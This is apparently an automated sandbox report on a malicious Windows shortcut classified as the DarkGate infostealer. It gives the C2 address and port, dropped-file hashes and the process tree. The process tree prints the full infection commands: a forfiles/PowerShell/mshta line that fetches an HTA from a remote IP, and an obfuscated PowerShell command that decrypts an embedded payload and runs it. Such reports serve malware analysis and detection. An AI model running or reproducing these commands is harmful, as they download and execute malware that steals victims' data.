Overview

overview

10

Static

static

1

example.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-03-2024 21:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    example.lnk

  • Size

    1KB

  • MD5

    a777dd29c0c24492eae7a4170d1599a5

  • SHA1

    a854b705c05dd4503d6de331cf1ad2716221c230

  • SHA256

    f31c862a31ee968dafb32532059403438d2cfa5aaf8b5b1ad089b6ac027cec34

  • SHA512

    5b0a100f1d0f61f3f87cc0f00e1be2096e009fe7b690dd37f32a4e3bb1d47495130e604f013ec1cf8f0616262b65d46090f5c3c81ee04172a9736a2b37994425

Score
10/10
darkgateadmin000stealer

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://206.188.196.222/w1

Extracted

Family

darkgate

Botnet

admin000

C2

145.239.202.110

Attributes
  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    8094

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    WXMqRdAD

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    admin000

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

    stealerdarkgate
  • Detect DarkGate stealer 11 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3024
      • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        2⤵
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:1516
    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
      1⤵
        PID:1712
        • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
          "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          PID:400
      • C:\Windows\system32\wbem\wmiprvse.exe
        C:\Windows\system32\wbem\wmiprvse.exe
        1⤵
          PID:2988
        • C:\Windows\system32\backgroundTaskHost.exe
          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca
          1⤵
            PID:3200
          • C:\Windows\system32\cmd.exe
            cmd /c C:\Users\Admin\AppData\Local\Temp\example.lnk
            1⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1288
            • C:\Windows\System32\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://206.188.196.222/w1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4908
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                start mshta http://206.188.196.222/w1
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4000
                • C:\Windows\system32\mshta.exe
                  "C:\Windows\system32\mshta.exe" http://206.188.196.222/w1
                  4⤵
                  • Blocklisted process makes network request
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:232
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $KwYpv = 'AAAAAAAAAAAAAAAAAAAAAEzs+9D77CG0GJH50MpYmOojggymvqfNwT2BwwMZ6Zch1NPQ4AaEOsRMLSsp37BXwgQFAcJXARJMw4KNZ6Y7TW/7d/nu7pzfbiyFeMXeJ/G7I+yEjYPlZ8DUExyMMos/vJAnGl8usgEZloGvRz8TUIcrZNDIcfk/B3F5cgw/gplSXLesuAC5iZvkjvEu4ZkyJG2ruIZT4E9K3VGLm97lYCyJeriEvUpS7f4nPfXGqN0Xt2cKdd+1Fcuq+tewAqdoUhkrSJypQw+eY6VcnBnzimnZ2DrH3ZJEkVQQAu5pgY5U4T3OK+4nVOiMMxnzy62vZcQB2pW4nMuCptYW5UL69nNNXBr9RfmPdPNlb3K9FYgBb9yEWlkJ09LgDgXUzGxe/JMoRCvNyoodUu3jSjBg7lJdnmUsk3S7OfFGBemQdj2lRAvSvDRr6V7HuKyohVR78wXrOdmsRr41xwEfnfFidvxhlSge/UfvIw+U/62JVt/z7eRnSeDytb5JrmrzGaYy6mcKVD10Qg3+BJi2pkcks1mjOsSkB+Y1yt6ka4GJ/fTfAqtwINI7W4P3iDlVt5+MRQIgnvbCbz0acqjO1hhWVa9FgGwYxTGdaybvFxIKJbMPZSxBRqx8Yf6hNfxwTNyzXn8QKBcHUEQrli7eBTKdEckO2/tpJXihaZoJIiuuufnnAvMpPDCMF+L0JKJV5DX/VHTpGbLRLe9nWvLQWHXxaf3JMUsa2zVmve/N/MMvFNMMTlVj17Pcnj2QTLr5M8sf1c6hmobwegCyUFtdQMCsjw3e9wYHR0Loj7gQmQV9DTtSlM+oqgzWvePRoI2EqPvi5UUvVbKzHYdAmufFIhDGfWdM46b0C4upLOTyNCiyYUMtmdbExfrGWfpG4S0l354r3uuyK2ptWfcACANia4Hsl4EI3abMngZ/gLTJ1gDmhLSJr3W8hV9rnaXvugiJQO7R2VVqOIjc/cGxM6UAV4n3cqvjF7Qd8yvNHnQGdCNTqXQE9W4NWUHRoZfdojbqfzngNA==';$qUoZKXum = 'RU1nU1ptd1B5dEJPQkRUQ2l6WFZUYXBjWWxNblJEZG4=';$kbbrdQK = New-Object 'System.Security.Cryptography.AesManaged';$kbbrdQK.Mode = [System.Security.Cryptography.CipherMode]::ECB;$kbbrdQK.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$kbbrdQK.BlockSize = 128;$kbbrdQK.KeySize = 256;$kbbrdQK.Key = [System.Convert]::FromBase64String($qUoZKXum);$LGvCV = [System.Convert]::FromBase64String($KwYpv);$QwRLGiHB = $LGvCV[0..15];$kbbrdQK.IV = $QwRLGiHB;$hBUppQDnl = $kbbrdQK.CreateDecryptor();$MoYXNlkIj = $hBUppQDnl.TransformFinalBlock($LGvCV, 16, $LGvCV.Length - 16);$kbbrdQK.Dispose();$NeMj = New-Object System.IO.MemoryStream( , $MoYXNlkIj );$NjSGYp = New-Object System.IO.MemoryStream;$iiYETcerF = New-Object System.IO.Compression.GzipStream $NeMj, ([IO.Compression.CompressionMode]::Decompress);$iiYETcerF.CopyTo( $NjSGYp );$iiYETcerF.Close();$NeMj.Close();[byte[]] $iFVgn = $NjSGYp.ToArray();$peosnCLg = [System.Text.Encoding]::UTF8.GetString($iFVgn);$peosnCLg | powershell -
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:744
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                      6⤵
                      • Blocklisted process makes network request
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:5004
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"
                        7⤵
                        • Checks processor information in registry
                        • Modifies Internet Explorer settings
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:764
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                          8⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2980
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8B32C92F35D8D7DE3A1C62BBC044A7D9 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                            9⤵
                              PID:632
                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=1226D610F511A51D9571F900AF0AAD8F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=1226D610F511A51D9571F900AF0AAD8F --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
                              9⤵
                                PID:812
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6EBECF8EC8630584F9AFECC082A3C079 --mojo-platform-channel-handle=2160 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                9⤵
                                  PID:3456
                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E02F4F822972405677D02CE5B0694CB3 --mojo-platform-channel-handle=2304 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                  9⤵
                                    PID:4924
                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5303F40C630B2E0F9988D7ECE231CB49 --mojo-platform-channel-handle=2432 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                    9⤵
                                      PID:4932
                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=1E53D33CE23E520133872817CAF02CC4 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=1E53D33CE23E520133872817CAF02CC4 --renderer-client-id=7 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job /prefetch:1
                                      9⤵
                                        PID:2128
                                  • C:\Users\Admin\AppData\Roaming\Autoit3.exe
                                    "C:\Users\Admin\AppData\Roaming\Autoit3.exe" C:\Users\Admin\AppData\Roaming\script.a3x
                                    7⤵
                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                    • Executes dropped EXE
                                    • Checks processor information in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of WriteProcessMemory
                                    PID:3844
                      • C:\Windows\System32\CompPkgSrv.exe
                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                        1⤵
                          PID:2328

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\akeceda\babhgaa
                          Filesize

                          1KB

                          MD5

                          4cb32501abd98b845e1d4d745fc5923d

                          SHA1

                          636cbb55e27aae975e96c9ca683887935e0f2847

                          SHA256

                          39458fee81699c7c9d3bfdde14f58a72b004ccb9e86734d032f71859ddebdbcb

                          SHA512

                          5ac3e552ba169e7d183acc50a6ab2d76396e7a9d07c69d52660843729d638c8ec7978d40654450a904a48d8a7b853c96e9760ea41c961fec09690fb4f2e329a2

                          Download Submit

                        • C:\ProgramData\akeceda\ghfdfef.a3x
                          Filesize

                          478KB

                          MD5

                          a892f17dcd76f204360d2cdd1142f57f

                          SHA1

                          63b7b3c36637c1a50184247992f64bbcb4117836

                          SHA256

                          5ce497ea7a9ab3ce159e3e20624326fe581c4c6b92d33f336674552ba7555288

                          SHA512

                          fbe23cb126fc14aae15e8b38475e6c036495b1a84e799a3777d7fdba5debd90b1def70a9931fdf580251d1dc9204f694ed79097a00b82f0876c05feed2529d66

                          Download Submit

                        • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                          Filesize

                          36KB

                          MD5

                          b30d3becc8731792523d599d949e63f5

                          SHA1

                          19350257e42d7aee17fb3bf139a9d3adb330fad4

                          SHA256

                          b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                          SHA512

                          523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                          Download Submit

                        • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                          Filesize

                          56KB

                          MD5

                          752a1f26b18748311b691c7d8fc20633

                          SHA1

                          c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                          SHA256

                          111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                          SHA512

                          a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                          Download Submit

                        • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                          Filesize

                          64KB

                          MD5

                          30c40e0cecdae941de6a977954f9b32b

                          SHA1

                          69be3bee16321fddbc0477f6149fc01fc13494d1

                          SHA256

                          96a2b9105a84a35745d7a73e5a933228495ca11a018066315833b7e759200eab

                          SHA512

                          ec5468418729ed9e4d7f5342342490b95ea8886d447d654230ad02de272aede7b733f7bdcd572dce818ee5e296b544799292247dd6701f724552e93a0ec3f4f1

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          64B

                          MD5

                          1a11402783a8686e08f8fa987dd07bca

                          SHA1

                          580df3865059f4e2d8be10644590317336d146ce

                          SHA256

                          9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

                          SHA512

                          5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vp5t1yek.prh.ps1
                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Autoit3.exe
                          Filesize

                          872KB

                          MD5

                          c56b5f0201a3b3de53e561fe76912bfd

                          SHA1

                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                          SHA256

                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                          SHA512

                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\hGdDhEa
                          Filesize

                          32B

                          MD5

                          bcbb61069bb5a222861c30cd7942a184

                          SHA1

                          fedb9545b1c9e85df979df86135a04cbcaff6c08

                          SHA256

                          ed892e889b542d979cf7d80a35d560a678bf946d0f66ac1a207d5a058e75d2e4

                          SHA512

                          01223ed23850911da8b21d87701f992e86aaca8436b1d09861adbda41be342921ec587fe40861521de18a148be5a1ecc903cf58f5556882b9cf31d5f8aad19c8

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\sample.pdf
                          Filesize

                          53KB

                          MD5

                          6bb492c383240fcd87b5c42958c2e482

                          SHA1

                          be75995fb0de7529ee5049696dfb519434385ab7

                          SHA256

                          4c76b7a367c810aa717ec49caf5bd8ee3edeefd197241f6bd3698ed5de2c4ddc

                          SHA512

                          dfafb4cae44be342c440d95342e1f3e65644b45ea375f3590f836347dd4e08727ec71118454104c150f4c5dea7887373cc53a20a781d428a308ee7237f9cd903

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\script.a3x
                          Filesize

                          468KB

                          MD5

                          09c72552b42b0fae2552c41acfbb7cf2

                          SHA1

                          6669f042ebb9db63e17e153fc8995b0590805f2c

                          SHA256

                          0bb0d54ffd2039653da143e12d566018e54309dddef9f6606d2d7484d27e65f0

                          SHA512

                          6f0d47e8d329b8da0f99f50f2e602eb79a5f18bb9ba619223df821c17e329651b56673fe1bf5b5af0ffe199e36cd4e6b39f244fe3b63ae09c314226777ce529c

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\test.txt
                          Filesize

                          76B

                          MD5

                          23e148a3d47b55033e9cca832d3f9725

                          SHA1

                          c973359fbdd34453f527b13780da41986e78b768

                          SHA256

                          9fb6cfff8eaaa0acac13a86f6626a9f9034ba7063daf33c4acb1d692dcbd70f4

                          SHA512

                          269368c92495a0b54b84eabbd216fac2db9c07f8ea445d68bbf2210ef76c0cedfff8ff892e3e00495122bfb455abbf18a25bfbc0dc34910f98c2320cc3e0d754

                          Download Submit

                        • C:\temp\dehagah
                          Filesize

                          4B

                          MD5

                          486c8850b3d8db5d1418006b96732a38

                          SHA1

                          489dc7a67c138aa36dfd615a5142d020c17f33d6

                          SHA256

                          8f3b644aca1667bae29d2cc7ba136df767d6edca30b6a562ae32770ff6b63338

                          SHA512

                          6b7c111d296f1ba076d2a3d2d6500bbdb12dbbb1c69ba0f5de4b3c78109633454de7326766626f1a4aa46f7a9971c68ab89e0a06523cc19c4573d2e976e91b89

                          Download Submit

                        • C:\temp\dkdhghk
                          Filesize

                          4B

                          MD5

                          cd3b62e88423d1eb50ccc4d5bf2cc80c

                          SHA1

                          2cb64697be47a3c99d972474f2212d1fa77c7b91

                          SHA256

                          6ce3e50826ac5c5785d91009c0bd801f6b660f8f1a18cd0dc86ed833fe03d01a

                          SHA512

                          b1228834610e760716221d7bec575453587be5f55dd8f45ef0e2daed655c40c308457e293e18448f6a83679642c07a81d43a3245df845eed978447435b1aeb24

                          Download Submit

                        • C:\temp\dkdhghk
                          Filesize

                          4B

                          MD5

                          8aead4f3166eadc58eb5c88af9d9673d

                          SHA1

                          1af30f012ea9fb37a88714d79aeee148b7e7611b

                          SHA256

                          14bfd19dd3416f49425a7b4c3cfb0222e8c2fe4a9cfafc92cd8017a6f78788ea

                          SHA512

                          90f786badc7549be9093fbe0c94565e895c77da4c2f02a8197cc568446b032b84464e9369f4848a483b45e3a130def6a5663d21e7ae80c853276bc1d84d5726c

                          Download Submit

                        • memory/400-91-0x0000000002A70000-0x0000000003212000-memory.dmp

                          Filesize

                          7.6MB

                          Download

                        • memory/400-133-0x0000000002A70000-0x0000000003212000-memory.dmp

                          Filesize

                          7.6MB

                          Download

                        • memory/400-132-0x0000000002A70000-0x0000000003212000-memory.dmp

                          Filesize

                          7.6MB

                          Download

                        • memory/400-120-0x0000000002A70000-0x0000000003212000-memory.dmp

                          Filesize

                          7.6MB

                          Download

                        • memory/400-131-0x0000000002A70000-0x0000000003212000-memory.dmp

                          Filesize

                          7.6MB

                          Download

                        • memory/400-239-0x0000000002A70000-0x0000000003212000-memory.dmp

                          Filesize

                          7.6MB

                          Download

                        • memory/744-21-0x000002213BFE0000-0x000002213BFF0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/744-20-0x000002213BFE0000-0x000002213BFF0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/744-19-0x00007FF886E70000-0x00007FF887931000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/744-76-0x00007FF886E70000-0x00007FF887931000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/764-137-0x00000000085D0000-0x00000000085F1000-memory.dmp

                          Filesize

                          132KB

                          Download

                        • memory/1516-125-0x00000000023C0000-0x0000000002B62000-memory.dmp

                          Filesize

                          7.6MB

                          Download

                        • memory/1516-136-0x00000000023C0000-0x0000000002B62000-memory.dmp

                          Filesize

                          7.6MB

                          Download

